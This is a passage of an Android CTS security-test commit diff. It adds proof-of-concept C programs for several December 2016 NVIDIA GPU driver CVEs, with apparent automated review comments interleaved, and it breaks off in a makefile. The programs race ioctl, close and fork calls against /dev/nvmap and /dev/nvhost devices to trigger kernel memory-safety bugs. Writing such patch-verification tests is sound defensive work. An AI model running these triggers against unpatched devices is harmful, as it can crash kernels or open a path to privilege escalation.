Commit for some of the critical bugs in December 2016

Test: this is a test

Change-Id: I8844dd82b0a7be912166746bd330ad3e819b81e9
diff --git a/hostsidetests/security/AndroidTest.xml b/hostsidetests/security/AndroidTest.xml
index 3f3894b..cd68c69 100644
--- a/hostsidetests/security/AndroidTest.xml
+++ b/hostsidetests/security/AndroidTest.xml
@@ -16,7 +16,34 @@
 <configuration description="Config for the CTS Security host tests">
     <target_preparer class="com.android.compatibility.common.tradefed.targetprep.FilePusher">
         <option name="cleanup" value="true" />
+        <option name="push" value="CVE-2016-8412->/data/local/tmp/CVE-2016-8412" />
+        <option name="push" value="CVE-2016-8444->/data/local/tmp/CVE-2016-8444" />
+        <option name="push" value="CVE-2016-8448->/data/local/tmp/CVE-2016-8448" />
+        <option name="push" value="CVE-2016-8449->/data/local/tmp/CVE-2016-8449" />
+        <option name="push" value="CVE-2016-8460->/data/local/tmp/CVE-2016-8460" />
+        <option name="push" value="CVE-2017-0403->/data/local/tmp/CVE-2017-0403" />
+        <option name="push" value="CVE-2017-0404->/data/local/tmp/CVE-2017-0404" />
+        <option name="push" value="CVE-2016-8482->/data/local/tmp/CVE-2016-8482" />
+        <option name="push" value="CVE-2017-0429->/data/local/tmp/CVE-2017-0429" />
+        <option name="push" value="CVE-2016-6730->/data/local/tmp/CVE-2016-6730" />
+        <option name="push" value="CVE-2016-6731->/data/local/tmp/CVE-2016-6731" />
+        <option name="push" value="CVE-2016-6732->/data/local/tmp/CVE-2016-6732" />
+        <option name="push" value="CVE-2016-6733->/data/local/tmp/CVE-2016-6733" />
+        <option name="push" value="CVE-2016-6734->/data/local/tmp/CVE-2016-6734" />
+        <option name="push" value="CVE-2016-6735->/data/local/tmp/CVE-2016-6735" />
+        <option name="push" value="CVE-2016-6736->/data/local/tmp/CVE-2016-6736" />
+        <option name="push" value="CVE-2016-8424->/data/local/tmp/CVE-2016-8424" />
+        <option name="push" value="CVE-2016-8425->/data/local/tmp/CVE-2016-8425" />
+        <option name="push" value="CVE-2016-8426->/data/local/tmp/CVE-2016-8426" />
+        <option name="push" value="CVE-2016-8427->/data/local/tmp/CVE-2016-8427" />
+        <option name="push" value="CVE-2016-8428->/data/local/tmp/CVE-2016-8428" />
+        <option name="push" value="CVE-2016-8429->/data/local/tmp/CVE-2016-8429" />
         <option name="push" value="CVE-2016-8430->/data/local/tmp/CVE-2016-8430" />
+        <option name="push" value="CVE-2016-8431->/data/local/tmp/CVE-2016-8431" />
+        <option name="push" value="CVE-2016-8432->/data/local/tmp/CVE-2016-8432" />
+        <option name="push" value="CVE-2016-8434->/data/local/tmp/CVE-2016-8434" />
+        <option name="push" value="CVE-2016-8435->/data/local/tmp/CVE-2016-8435" />
+        <option name="push" value="CVE-2016-9120->/data/local/tmp/CVE-2016-9120" />
         <option name="append-bitness" value="true" />
     </target_preparer>
     <test class="com.android.compatibility.common.tradefed.testtype.JarHostTest" >
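Review bot: The added `push` options are not in CVE order (`CVE-2017-0403`, `CVE-2017-0404` and `CVE-2017-0429` sit between 2016 entries, and the `CVE-2016-673x` group follows `CVE-2016-8482`), which makes a missing or duplicated entry hard to spot; sorting the list would help. Each entry presumably needs a module that builds a binary of the same name, and modules for several of the names listed here (for example `CVE-2016-8412` and `CVE-2016-9120`) are not visible in this part of the patch, so confirm they exist elsewhere in the change. A one-line XML comment above the list stating that every `push` value must match a `securityPatch` module name would document that contract.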
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8424/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8424/Android.mk
new file mode 100644
index 0000000..5ff169b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8424/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8424
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
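Review bot: The warning and hardening flags on the four `CFLAGS +=` lines and the `LDFLAGS += -rdynamic` line are assigned to plain make variables rather than the module's `LOCAL_*` variables, so the build most likely never passes `-Wall`, `-Wformat=2` or `-D_FORTIFY_SOURCE=2` to poc.c. Replace `CFLAGS +=` with `LOCAL_CFLAGS +=` and `LDFLAGS +=` with `LOCAL_LDFLAGS +=`, matching the existing `LOCAL_LDFLAGS += -fPIE -pie` line. Appending to a global `CFLAGS` may also leak into makefiles parsed later. The same lines are repeated in the Android.mk hunks for CVE-2016-8425, CVE-2016-8426, CVE-2016-8427, CVE-2016-8428 and CVE-2016-8429.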
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8424/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8424/poc.c
new file mode 100644
index 0000000..4460b88
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8424/poc.c
@@ -0,0 +1,138 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+
+#include <stdlib.h>
+#include <errno.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+
+struct nvmap_handle_param {
+	__u32 handle;		/* nvmap handle */
+	__u32 param;		/* size/align/base/heap etc. */
+	unsigned long result;	/* returns requested info*/
+};
+
+struct nvmap_create_handle {
+	union {
+		__u32 id;	/* FromId */
+		__u32 size;	/* CreateHandle */
+		__s32 fd;	/* DmaBufFd or FromFd */
+	};
+	__u32 handle;		/* returns nvmap handle */
+};
+
+#define NVMAP_IOC_MAGIC 'N'
+#define NVMAP_IOC_CREATE  _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
+#define NVMAP_IOC_GET_ID  _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
+#define NVMAP_IOC_GET_FD  _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
+#define NVMAP_IOC_FREE       _IO(NVMAP_IOC_MAGIC, 4)
+
+int g_fd = -1;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+struct nvmap_create_handle* g_allocation = NULL;
+
+int open_driver() {
+    char* dev_path = "/dev/nvmap";
+    g_fd = open(dev_path, O_RDWR);
+    if (g_fd < 0) {
+        printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+    } else {
+        printf("[*] open file(%s) succ!\n", dev_path);
+    }
+    return g_fd;
+}
+
+void trigger_nvmap_create() {
+    ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
+    //printf("[*] NVMAP_IOC_CREATE, fd(%d), last error = %d\n", g_allocation->handle, errno);
+}
+
+void trigger_nvmap_free() {
+    static int data = 1024;
+    ioctl(g_fd, NVMAP_IOC_FREE, data);
+    //printf("[*] NVMAP_IOC_FREE last error = %d\n", errno);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+    setpriority(PRIO_PROCESS, gettid(), privi);
+    printf("[*] setpriority(%d) errno = %d\n", privi, errno);
+
+    /* bind process to a CPU*/
+    if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+        printf("[*] sched_setaffinity(%ld) errno = %d\n", cpu_mask, errno);
+    }
+}
+
+void prepare_data() {
+    void* data = calloc(1, 0x1000);
+
+    g_allocation = (struct nvmap_create_handle*)data;
+    g_allocation->size = 1024;
+
+    mprotect(data, 0x1000, PROT_READ);
+    printf("[*] mprotect, error = %d\n", errno);
+}
+static int init = 0;
+void* race_thread(void* arg) {
+    setup_privi_and_affinity(0, 2);
+
+    int i;
+    while (1) {
+        if (init == 0) {
+            pthread_mutex_lock(&mutex);
+            pthread_cond_wait(&cond, &mutex);
+            pthread_mutex_unlock(&mutex);
+            init = 1;
+        }
+        trigger_nvmap_free();
+    }
+}
+
+int main(int argc, char**argv) {
+    setup_privi_and_affinity(0, 1);
+    if (open_driver() < 0) {
+        return -1;
+    }
+    prepare_data();
+    pthread_t tid;
+    pthread_create(&tid, NULL, race_thread, NULL);
+    sleep(1);
+    while (1) {
+        if (init == 0)
+            pthread_cond_signal(&cond);
+        trigger_nvmap_create();
+    }
+    return 0;
+}
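Review bot: `prepare_data()` dereferences the `calloc()` result without a NULL check and ignores the return value of `mprotect()`, then prints `errno` unconditionally, so a failed setup is logged with a stale value and the test carries on as if it had succeeded. `mprotect()` requires a page-aligned address, which `calloc()` does not promise, so a silent `EINVAL` here would let the run finish without exercising the intended path and be read as a "patched" result. Check both calls and bail out, e.g. `if (mprotect(data, 0x1000, PROT_READ) != 0) { perror("mprotect"); exit(1); }`, and print `errno` only after a call has actually failed (also in `setup_privi_and_affinity()`; the ioctl wrappers in the CVE-2016-8428 poc.c follow the same pattern). Both `while (1)` loops are unbounded, so the binary ends only when the harness kills it; an iteration or time limit would make the test self-terminating.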
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8425/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8425/Android.mk
new file mode 100644
index 0000000..e984812
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8425/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8425
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8425/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8425/poc.c
new file mode 100644
index 0000000..498bca4
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8425/poc.c
@@ -0,0 +1,140 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define ERR(fmt, ...)   printf(fmt ": %d(%s)\n", ##__VA_ARGS__, errno, strerror(errno))
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+#define CLOSE_THREAD_NUM	100
+#define TRY_TIMES		900
+
+#define DEV "/dev/nvhost-vic"
+
+struct nvhost_channel_open_args {
+	__s32 channel_fd;
+};
+
+#define NVHOST_IOCTL_MAGIC 'H'
+#define NVHOST_IOCTL_CHANNEL_OPEN	\
+	_IOR(NVHOST_IOCTL_MAGIC,  112, struct nvhost_channel_open_args)
+
+int fd;
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+pthread_t toggle_thread_id;
+
+static int set_affinity(int num)
+{
+	int ret = 0;
+	cpu_set_t mask;
+	CPU_ZERO(&mask);
+	CPU_SET(num, &mask);
+	ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+	if(ret == -1){
+		printf("[-] set affinity failed: [%d]-%s\n", errno, strerror(errno));
+	}
+	return ret;
+}
+
+static void prepare()
+{
+	return;
+}
+
+volatile int target_fd;
+volatile int attack;
+void* close_thread(void* no_use)
+{
+	set_affinity(1);
+
+	while(attack){
+		usleep(200);
+		close(target_fd);
+	}
+
+	return NULL;
+}
+
+int main()
+{
+	int i, try_time = TRY_TIMES, ret;
+	struct nvhost_channel_open_args o_args = { 0 };
+
+	/* bind_cpu */
+	set_affinity(0);
+
+	/* open dev */
+	fd = open(DEV,O_RDONLY);
+	if(fd == -1){
+		ERR("[-] open failed");
+		return 0;
+	} else {
+		printf("[+] open OK\n");
+	}
+
+	#if 1
+	ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
+	if(ret == -1) {
+		ERR("[-] ioctl failed");
+		goto out_dev;
+	} else {
+		printf("[+] ioctl OK, fd = %d\n", o_args.channel_fd);
+	}
+
+	target_fd = o_args.channel_fd;	
+	#endif
+
+	/* create close thread */
+	#if 1
+	attack = 1;
+	for(i = 0; i < CLOSE_THREAD_NUM; i++){
+		ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL);
+		if(ret){
+			goto out_close_thread;
+		}
+	}
+	#endif
+
+	#if 1
+	for(i = 0; i < TRY_TIMES; i++){
+		/* open */
+		ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
+		usleep(200);
+	}
+	#endif
+	
+out_close_thread:
+	attack = 0;
+	/* kill close thread */
+	for(i = 0; i < CLOSE_THREAD_NUM; i++){
+		if(close_thread_id[i])
+			pthread_join(close_thread_id[i], NULL);
+	}
+out_dev:
+	close(fd);
+	return 0;
+}
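Review bot: `attack` and `target_fd` are shared between `main()` and the 100 `close_thread()` workers through `volatile int`, which is not a synchronisation primitive in C; the stop flag should be an `atomic_int` from `<stdatomic.h>` (`atomic_store(&attack, 0)` and `while (atomic_load(&attack))`) so the join loop is guaranteed to finish. The hunk also carries dead code that `-Wall` would flag: `prepare()`, `toggle_thread_id`, `try_time`, `ARRAY_SIZE` and the `#if 1` wrappers can be removed. `main()` returns 0 when `open()` fails, so a device without the node is indistinguishable from a completed run; presumably the host side decides the verdict, but a distinct exit code would make that explicit. The file has no comment saying what the test exercises or what a pass looks like, and a short header comment would help. The same points apply to the CVE-2016-8426 poc.c.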
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8426/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8426/Android.mk
new file mode 100644
index 0000000..a134d9c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8426/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8426
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8426/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8426/poc.c
new file mode 100644
index 0000000..c423416
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8426/poc.c
@@ -0,0 +1,147 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define ERR(fmt, ...)   printf(fmt ": %d(%s)\n", ##__VA_ARGS__, errno, strerror(errno))
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+#define CLOSE_THREAD_NUM	100
+#define TRY_TIMES		900
+
+#define DEV "/dev/nvhost-gpu"
+
+struct nvhost_channel_open_args {
+	__s32 channel_fd;
+};
+
+#define NVHOST_IOCTL_MAGIC 'H'
+#define NVHOST_IOCTL_CHANNEL_OPEN	\
+	_IOR(NVHOST_IOCTL_MAGIC,  112, struct nvhost_channel_open_args)
+
+int fd;
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+pthread_t toggle_thread_id;
+
+static int set_affinity(int num)
+{
+	int ret = 0;
+	cpu_set_t mask;
+	CPU_ZERO(&mask);
+	CPU_SET(num, &mask);
+	ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+	if(ret == -1){
+		printf("[-] set affinity failed: [%d]-%s\n", errno, strerror(errno));
+	}
+	return ret;
+}
+
+static void prepare()
+{
+	return;
+}
+
+volatile int target_fd;
+volatile int attack;
+void* close_thread(void* no_use)
+{
+	set_affinity(1);
+
+	while(attack){
+		usleep(200);
+		close(target_fd);	
+	}
+
+	return NULL;
+}
+
+int main()
+{
+	int i, try_time = TRY_TIMES, ret;
+	struct nvhost_channel_open_args o_args = { 0 };
+
+	/* bind_cpu */
+	set_affinity(0);
+
+	/* open dev */
+	fd = open(DEV,O_RDONLY);
+	if(fd == -1){
+		ERR("[-] open failed");
+		return 0;
+	} else {
+		printf("[+] open OK\n");
+	}
+
+	#if 1
+	ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
+	if(ret == -1) {
+		ERR("[-] ioctl failed");
+		goto out_dev;
+	} else {
+		printf("[+] ioctl OK, fd = %d\n", o_args.channel_fd);
+	}
+
+	target_fd = o_args.channel_fd;	
+	#endif
+
+	/* create close thread */
+	#if 1
+	attack = 1;
+	for(i = 0; i < CLOSE_THREAD_NUM; i++){
+		ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL);
+		if(ret){
+			printf("[+] create close thread %d failed %d %s\n", i, errno, strerror(errno));
+			goto out_close_thread;
+		}
+	}
+	#endif
+
+	#if 1
+	for(i = 0; i < TRY_TIMES; i++){
+		printf("[+] %03d times\n", i);
+		/* open */
+		ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
+		if(ret == -1) {
+			ERR("[-] ioctl failed");
+		} else {
+			printf("[+] ioctl OK, fd = %d\n", o_args.channel_fd);
+		}
+		usleep(200);
+	}
+	#endif
+	
+out_close_thread:
+	attack = 0;
+	/* kill close thread */
+	for(i = 0; i < CLOSE_THREAD_NUM; i++){
+		if(close_thread_id[i])
+			pthread_join(close_thread_id[i], NULL);
+	}
+out_dev:
+	close(fd);
+	return 0;
+}
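Review bot: The failure branch after `pthread_create()` logs `errno` and `strerror(errno)`, but `pthread_create()` reports errors through its return value and does not set `errno`, so the message can show an unrelated error. Use the value already held in `ret`: `printf("[-] create close thread %d failed %d %s\n", i, ret, strerror(ret));` (the `[+]` prefix on a failure line is also misleading). In the retry loop every successful `NVHOST_IOCTL_CHANNEL_OPEN` overwrites `o_args.channel_fd` without closing the previous descriptor, so up to `TRY_TIMES` descriptors stay open until exit; if that is deliberate, a comment should say so.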
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8427/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8427/Android.mk
new file mode 100644
index 0000000..131f240
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8427/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8427
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8427/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8427/poc.c
new file mode 100644
index 0000000..0c54420
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8427/poc.c
@@ -0,0 +1,94 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <string.h>
+#include <stdint.h>
+#include <pthread.h>
+#include <linux/ion.h>
+
+#define NVHOST_DBG_GPU_IOCTL_BIND_CHANNEL 0xc0084401ul
+
+
+int fd_gpu;
+int fd_dbg;
+int fd_dbg_1;
+
+void *thr(void *arg)
+{
+	int ioarg[2];
+	switch ((long)arg) {
+	case 0:
+		fd_dbg = open("/dev/nvhost-dbg-gpu",0x0ul,0x101000ul);
+		break;
+	case 1:
+		fd_dbg_1 = dup3(fd_dbg, fd_dbg,0x80000ul);
+		break;
+	case 2:
+		ioarg[0] = fd_dbg_1;
+		ioarg[1] = 0; 
+		ioctl(fd_dbg,NVHOST_DBG_GPU_IOCTL_BIND_CHANNEL,ioarg, 0, 0, 0);
+		break;
+	case 3:
+		fd_gpu = open("/dev/nvhost-gpu",0x0ul,0x2000ul);
+		break;
+	case 4:
+		ioarg[0] = fd_gpu;
+		ioarg[1] = 0;
+		ioctl(fd_dbg,NVHOST_DBG_GPU_IOCTL_BIND_CHANNEL,ioarg);
+		break;
+	case 5:
+		ioarg[0] = fd_gpu;
+		ioarg[1] = 0; 
+		ioctl(fd_dbg,NVHOST_DBG_GPU_IOCTL_BIND_CHANNEL,ioarg);
+		break;
+	}
+	return 0;
+}
+int poc()
+{
+	long i;
+	pthread_t th;
+	for (i = 0; i < 6; i++) {
+		pthread_create(&th, 0, thr, (void*)i);
+		usleep(10000);
+	}
+	for (i = 0; i < 6; i++) {
+		pthread_create(&th, 0, thr, (void*)i);
+		if (i%2==0)
+			usleep(10000);
+	}
+	usleep(100000);
+	return 0;
+}
+
+
+int main(int argc, char const *argv[])
+{
+	int pid;
+	while(1){
+		pid = fork();
+		if(pid){
+			usleep(30000);
+		}else
+			return poc();
+	}
+	return 0;
+}
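Review bot: `main()` forks in an endless `while(1)` loop without ever calling `waitpid()` and treats a `fork()` failure (`pid == -1`) as the parent branch, so zombie children accumulate on the test device until the harness kills the process. Bound the loop and reap each child, e.g. `if (pid < 0) break;` followed by `waitpid(pid, NULL, 0);` in the parent (this needs `<sys/wait.h>`). `ioctl()` is called without including `<sys/ioctl.h>`, one call passes three extra trailing arguments (`ioarg, 0, 0, 0`), and `<linux/ion.h>` is included although nothing from it is used. The hex literals passed to `open()` and `dup3()` would be easier to review as named `O_*` constants, and `poc()` overwrites `th` on every `pthread_create()`, so none of the threads is ever joined.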
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8428/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8428/Android.mk
new file mode 100644
index 0000000..21326f9
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8428/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8428
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
